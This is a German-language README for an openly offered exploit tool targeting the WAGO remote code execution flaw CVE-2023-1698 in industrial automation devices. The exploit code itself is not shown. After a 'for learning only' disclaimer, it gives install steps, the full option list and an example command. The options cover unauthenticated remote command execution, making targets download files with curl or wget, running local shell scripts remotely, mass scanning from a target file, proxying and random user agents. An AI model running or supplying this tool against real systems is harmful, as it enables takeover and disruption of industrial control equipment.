
WAGO-System Remote-Codeausführung-Schwachstelle (CVE-2023-1698)
WAGO-System-Ferncodeausführungs-Schwachstelle (CVE-2023-1698)
Ich habe ein Tool für lokale Tests und POC-Entwicklung entwickelt, das nur als technische Lernreferenz dient. Bitte verwenden Sie es nicht für illegale Zwecke. Direkte oder indirekte Konsequenzen und Verluste, die durch die Nutzung der in diesem Artikel bereitgestellten Informationen durch Einzelpersonen oder Organisationen entstehen, liegen in der Verantwortung der Benutzer und haben nichts mit dem Autor zu tun!!!

WAGO ist ein Unternehmen, das sich auf elektrische Verbindungstechnik, Automatisierung und Schnittstellenelektronik spezialisiert hat. In mehreren Produkten von WAGO ermöglicht eine Sicherheitslücke nicht authentifizierten entfernten Angreifern, neue Benutzer zu erstellen und Gerätekonfigurationen zu ändern, was zu Remote-RCE, Denial-of-Service und Schäden am gesamten System führen kann.
pip install -r requirements.txt
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
[--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
[--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]
WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Enter target object
-f FILE, --file FILE Input target object file
--remote-file-include REMOTE_FILE_INCLUDE
Enter the filepath(it must be On the public network)
--local-file-include LOCAL_FILE_INCLUDE
Enter the filepath(it must be On the local)
--remote-command REMOTE_COMMAND
Enter the command you want to execute
--random-agent RANDOM_AGENT
Using random user agents
-d DELAY, --delay DELAY
Set multi threaded access latency (setting range from 0 to 5)
-t THREAD, --thread THREAD
Set the number of program threads (setting range from 1 to 50)
--proxy PROXY Set up the proxy
--type TYPE Set up the remote upload file type
-o OUTPUT, --output OUTPUT
output filename
--remote-file-include, gibt eine entfernte Datei-URL an und lädt die Datei über curl oder wget in das tmp-Verzeichnis oder das aktuelle Verzeichnis hoch. --local-file-include, analysiert lokale Shell-Skriptdateien und führt sie remote aus. --remote-command REMOTE, führt einen Systembefehl aus.
python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"